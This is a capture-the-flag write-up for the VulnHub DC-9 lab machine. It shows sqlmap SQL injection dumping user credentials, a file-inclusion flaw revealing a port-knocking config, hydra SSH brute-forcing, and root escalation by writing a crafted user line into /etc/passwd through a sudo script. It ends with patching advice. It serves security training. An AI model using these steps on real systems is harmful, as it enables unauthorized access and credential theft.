--- title: "Writeup - DC-9 (VulnHub)" date: 2022-05-10 slug: "writeup-dc-9-vulnhub" type: "writeup-ctf" --- This is a writeup for the [DC-9](https://www.vulnhub.com/entry/dc-9,412/) machine from the VulnHub site. ## Enumeration First, let's start with a scan of our target with the following command: ```bash nmap -sV -T4 -Pn 192.168.56.101 ``` One TCP ports are discovered: ![](img/image-1.webp) - 80/tcp : HTTP web server (Apache 2.4.38) ![](img/image-2.webp) ## Exploit At first I start by making a scan of the website folders. ![](img/image-3.webp) Quite a lot of different pages, I start by making a capture of a request sent by the `search.php` page with the help of Burp. I then run a SQL vulnerability scan with `sqlmap`. ```bash sqlmap -r request.txt --dbs --batch ``` The target is usable, I find 3 databases in the result of the command. I start with `users` : ![](img/image-4.webp) ![](img/image-5.webp) Many different credentials... Looking in the `Staff` database, I find an admin password hash. ![](img/image-6.webp) So I go on [crackstation](https://crackstation.net/) to try to find it. ![](img/image-7.webp) I can now connect to the admin panel of the site. In this panel we have the possibility to add records. I notice that at the bottom of the page `manage.php`, there is an error message : `File does not exist`. I wonder if there is not an argument. After some test I find that there is a `file` argument. This allows me to find the following file: ```bash File does not exist [options] UseSyslog [openSSH] sequence = 7469,8475,9842 seq_timeout = 25 command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn [closeSSH] sequence = 9842,8475,7469 seq_timeout = 25 command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn ``` This is a file that allows you to configure port knocking to unblock the SSH port! So I try to realize the sequence with the following commands: ```bash nmap -Pn --max-retries 0 -p 7469 192.168.56.101 nmap -Pn --max-retries 0 -p 8475 192.168.56.101 nmap -Pn --max-retries 0 -p 9842 192.168.56.101 ``` And indeed it worked, I now have access to the SSH port: ![](img/image-8.webp) In the database export, we found a lot of names and passwords. I create two lists and launch an automatic test of the different combinations with `hydra` : ![](img/image-9.webp) After a few minutes `hydra` finds several combinations that work. It is by connecting as a `janitor` that I finally find an interesting file: ![](img/image-10.webp) A list of passwords, so I add them to my existing list and I restart `hydra` : ![](img/image-11.webp) A new combination is found! So I connect in SSH. ## Privilege escalation I start by checking the sudo permissions of my user. ![](img/image-12.webp) By executing the script I understand that it uses two arguments: one in reading and the other in writing. ```bash fredf@dc-9:~$ sudo /opt/devstuff/dist/test/test Usage: python test.py read append ``` I will try to add a new admin user to the system. To do this I start by generating a hash+salt with the following command: ```bash fredf@dc-9:~$ openssl passwd -1 -salt d3vyce azerty $1$d3vyce$n/tLRqvTUr3ygHuTSvi9g1 ``` I add the line of my user in a temporary file : ```bash fredf@dc-9:/opt/devstuff/dist/test$ cat ~/user.txt d3vyce:$1$d3vyce$n/tLRqvTUr3ygHuTSvi9g1:0:0:root:/root:/bin/bash ``` Then I add my user with the following command: ```bash sudo ./test ~/user.txt /etc/passwd ``` Finally I change user: ![](img/image-13.webp) I now have a root shell on the machine! ## Recommendations To patch this host I think it would be necessary to perform a number of actions: - Update the site to avoid SQL injection - Do not leave an argument `file` if not used - Do not store clear passwords in a database - Do not let a script run in root if not necessary